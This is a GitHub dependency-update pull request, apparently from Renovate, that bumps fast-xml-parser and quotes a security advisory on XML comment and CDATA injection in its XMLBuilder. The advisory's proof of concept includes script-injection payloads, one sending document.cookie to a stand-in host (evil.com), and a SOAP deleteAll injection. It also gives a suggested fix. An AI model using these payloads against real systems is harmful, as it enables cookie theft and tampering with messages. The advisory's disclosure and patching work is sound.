Skip to content

fix(deps): update dependency fast-xml-parser to v5.7.0 [security]#4591

Open
renovate[bot] wants to merge 2 commits intomainfrom
chore/renovate/npm-fast-xml-parser-vulnerability
Open

fix(deps): update dependency fast-xml-parser to v5.7.0 [security]#4591
renovate[bot] wants to merge 2 commits intomainfrom
chore/renovate/npm-fast-xml-parser-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate Bot commented Apr 23, 2026

This PR contains the following updates:

Package Change Age Confidence
fast-xml-parser 5.5.95.7.0 age confidence

fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters

CVE-2026-41650 / GHSA-gh4j-gqv2-49f6

More information

Details

fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters
Summary

fast-xml-parser XMLBuilder does not escape the --> sequence in comment content or the ]]> sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.

Existing CVEs for fast-xml-parser cover different issues:

This finding covers unescaped comment/CDATA delimiters in XMLBuilder - a distinct vulnerability.

Vulnerable Code

File: src/fxb.js

// Line 442 - Comment building with NO escaping of -->
buildTextValNode(val, key, attrStr, level) {
    // ...
    if (key === this.options.commentPropName) {
        return this.indentate(level) + `<!--${val}-->` + this.newLine;  // VULNERABLE
    }
    // ...
    if (key === this.options.cdataPropName) {
        return this.indentate(level) + `<![CDATA[${val}]]>` + this.newLine;  // VULNERABLE
    }
}

Compare with attribute/text escaping which IS properly handled via replaceEntitiesValue().

Proof of Concept
Test 1: Comment Injection (XSS in SVG/HTML context)
import { XMLBuilder } from 'fast-xml-parser';

const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true,
  suppressEmptyNode: true
});

const xml = {
  root: {
    "#comment": "--><script>alert('XSS')</script><!--",
    data: "legitimate content"
  }
};

console.log(builder.build(xml));

Output:

<root>
  <!----><script>alert('XSS')</script><!---->
  <data>legitimate content</data>
</root>
Test 2: CDATA Injection (RSS feed)
const builder = new XMLBuilder({
  cdataPropName: "#cdata",
  format: true,
  suppressEmptyNode: true
});

const rss = {
  rss: { channel: { item: {
    title: "Article",
    description: {
      "#cdata": "Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more"
    }
  }}}
};

console.log(builder.build(rss));

Output:

<rss>
  <channel>
    <item>
      <title>Article</title>
      <description>
        <![CDATA[Content]]><script>fetch('https://evil.com/'+document.cookie)</script><![CDATA[more]]>
      </description>
    </item>
  </channel>
</rss>
Test 3: SOAP Message Injection
const builder = new XMLBuilder({
  commentPropName: "#comment",
  format: true
});

const soap = {
  "soap:Envelope": {
    "soap:Body": {
      "#comment": "Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!--",
      Action: "getBalance",
      UserId: "12345"
    }
  }
};

console.log(builder.build(soap));

Output:

<soap:Envelope>
  <soap:Body>
    <!--Request from user: --><soap:Body><Action>deleteAll</Action></soap:Body><!---->
    <Action>getBalance</Action>
    <UserId>12345</UserId>
  </soap:Body>
</soap:Envelope>

The injected <Action>deleteAll</Action> appears as a real SOAP action element.

Tested Output

All tests run on Node.js v22, fast-xml-parser v5.5.12:

1. COMMENT INJECTION:
   Injection successful: true

2. CDATA INJECTION (RSS feed scenario):
   Injection successful: true

4. Round-trip test:
   Injection present: true

5. SOAP MESSAGE INJECTION:
   Contains injected Action: true
Impact

An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:

  1. XSS: Inject <script> tags into XML/SVG/HTML documents served to browsers
  2. SOAP injection: Modify SOAP message structure by injecting XML elements
  3. RSS/Atom feed poisoning: Inject scripts into RSS feed items via CDATA breakout
  4. XML document manipulation: Break XML structure by escaping comment/CDATA context

This is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).

Suggested Fix

Escape delimiters in comment and CDATA content:

// For comments: replace -- with escaped equivalent
if (key === this.options.commentPropName) {
    const safeVal = String(val).replace(/--/g, '&#&#8203;45;&#&#8203;45;');
    return this.indentate(level) + `<!--${safeVal}-->` + this.newLine;
}

// For CDATA: split on ]]> and rejoin with separate CDATA sections
if (key === this.options.cdataPropName) {
    const safeVal = String(val).replace(/]]>/g, ']]]]><![CDATA[>');
    return this.indentate(level) + `<![CDATA[${safeVal}]]>` + this.newLine;
}

Severity

  • CVSS Score: 6.1 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

NaturalIntelligence/fast-xml-parser (fast-xml-parser)

v5.7.0

Compare Source

v5.6.0

Compare Source

v5.5.12

Compare Source

v5.5.11

Compare Source

v5.5.10: performance improvment, increase entity expansion default limit

Compare Source

  • increase default entity explansion limit as many projects demand for that
maxEntitySize: 10000,
maxExpansionDepth: 10000,
maxTotalExpansions: Infinity,
maxExpandedLength: 100000,
maxEntityCount: 1000,
  • performance improvement
    • reduce calls to toString
    • early return when entities are not present
    • prepare rawAttrsForMatcher only if user sets jPath: false

Full Changelog: NaturalIntelligence/fast-xml-parser@v5.5.9...v5.5.10

Configuration

📅 Schedule: (in timezone America/Los_Angeles)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate Bot added the security Security related label Apr 23, 2026
@renovate renovate Bot requested review from a team as code owners April 23, 2026 05:12
@renovate renovate Bot added the security Security related label Apr 23, 2026
@renovate
Copy link
Copy Markdown
Contributor Author

renovate Bot commented Apr 23, 2026
edited
Loading

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: pnpm-lock.yaml
Scope: all 97 workspace projects
Progress: resolved 1, reused 0, downloaded 0, added 0
Progress: resolved 25, reused 0, downloaded 0, added 0
examples/ui-prompting-examples           |  WARN  deprecated @types/[email protected]
Progress: resolved 50, reused 0, downloaded 0, added 0
Progress: resolved 83, reused 0, downloaded 0, added 0
packages/axios-extension                 |  WARN  deprecated @xmldom/[email protected]
/tmp/renovate/repos/github/SAP/open-ux-tools/packages/backend-proxy-middleware-cf:
 ERR_PNPM_UNSUPPORTED_ENGINE  Unsupported environment (bad pnpm and/or Node.js version)

This error happened while installing a direct dependency of /tmp/renovate/repos/github/SAP/open-ux-tools/packages/backend-proxy-middleware-cf

Your Node version is incompatible with "@sap/[email protected]".

Expected version: ^20.0.0 || ^22.0.0
Got: v24.15.0

This is happening because the package's manifest has an engines.node field specified.
To fix this issue, install the required Node version.

@changeset-bot
Copy link
Copy Markdown

changeset-bot Bot commented Apr 23, 2026
edited
Loading

🦋 Changeset detected

Latest commit: 98d7b7b

The changes in this PR will be included in the next version bump.

This PR includes changesets to release 58 packages
Name Type
@sap-ux/odata-cli Patch
@sap-ux/axios-extension Patch
@sap-ux/fiori-docs-embeddings Patch
@sap-ux/odata-service-inquirer Patch
@sap-ux/odata-service-writer Patch
@sap-ux/project-access Patch
@sap-ux/abap-deploy-config-inquirer Patch
@sap-ux/abap-deploy-config-sub-generator Patch
@sap-ux/adp-flp-config-sub-generator Patch
@sap-ux/adp-tooling Patch
@sap-ux/app-config-writer Patch
@sap-ux/backend-proxy-middleware Patch
@sap-ux/create Patch
@sap-ux/deploy-config-generator-shared Patch
@sap-ux/deploy-tooling Patch
@sap-ux/environment-check Patch
@sap-ux/fiori-app-sub-generator Patch
@sap-ux/fiori-generator-shared Patch
@sap-ux/fiori-mcp-server Patch
@sap-ux/flp-config-inquirer Patch
@sap-ux/generator-adp Patch
@sap-ux/preview-middleware Patch
@sap-ux/repo-app-import-sub-generator Patch
@sap-ux/system-access Patch
@sap-ux/ui-service-inquirer Patch
@sap-ux/ui-service-sub-generator Patch
@sap-ux/generator-simple-fe Patch
@sap-ux/deploy-config-sub-generator Patch
@sap-ux/fiori-elements-writer Patch
@sap-ux/fiori-freestyle-writer Patch
@sap-ux/inquirer-common Patch
@sap-ux/abap-deploy-config-writer Patch
@sap-ux/annotation-generator Patch
@sap-ux/cap-config-writer Patch
@sap-ux/cf-deploy-config-sub-generator Patch
@sap-ux/cf-deploy-config-writer Patch
@sap-ux/eslint-plugin-fiori-tools Patch
@sap-ux/fe-fpm-writer Patch
@sap-ux/fiori-annotation-api Patch
@sap-ux/flp-config-sub-generator Patch
@sap-ux/launch-config Patch
@sap-ux/mockserver-config-writer Patch
@sap-ux/project-input-validator Patch
@sap-ux/project-integrity Patch
@sap-ux/telemetry Patch
@sap-ux/ui5-application-inquirer Patch
@sap-ux/ui5-library-reference-inquirer Patch
@sap-ux/ui5-library-reference-sub-generator Patch
@sap-ux/ui5-library-reference-writer Patch
@sap-ux/ui5-library-writer Patch
@sap-ux/ui5-test-writer Patch
@sap-ux-private/adaptation-editor-tests Patch
@sap-ux/backend-proxy-middleware-cf Patch
@sap-ux/cf-deploy-config-inquirer Patch
@sap-ux/ui5-library-inquirer Patch
@sap-ux-private/preview-middleware-client Patch
@sap-ux/fe-fpm-cli Patch
@sap-ux/ui5-library-sub-generator Patch

Not sure what this means? Click here to learn what changesets are.

Click here if you're a maintainer who wants to add another changeset to this PR

@renovate renovate Bot force-pushed the chore/renovate/npm-fast-xml-parser-vulnerability branch 7 times, most recently from 27d71fe to 3227e58 Compare April 23, 2026 12:22
@sonarqubecloud
Copy link
Copy Markdown

sonarqubecloud Bot commented Apr 23, 2026

Quality Gate Passed Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud

@renovate renovate Bot force-pushed the chore/renovate/npm-fast-xml-parser-vulnerability branch 2 times, most recently from 6bfa596 to d1c0575 Compare April 23, 2026 13:00
@renovate renovate Bot force-pushed the chore/renovate/npm-fast-xml-parser-vulnerability branch from de32674 to 30ba57a Compare April 23, 2026 14:03
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

security Security related

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

1 participant

@kranthie-sap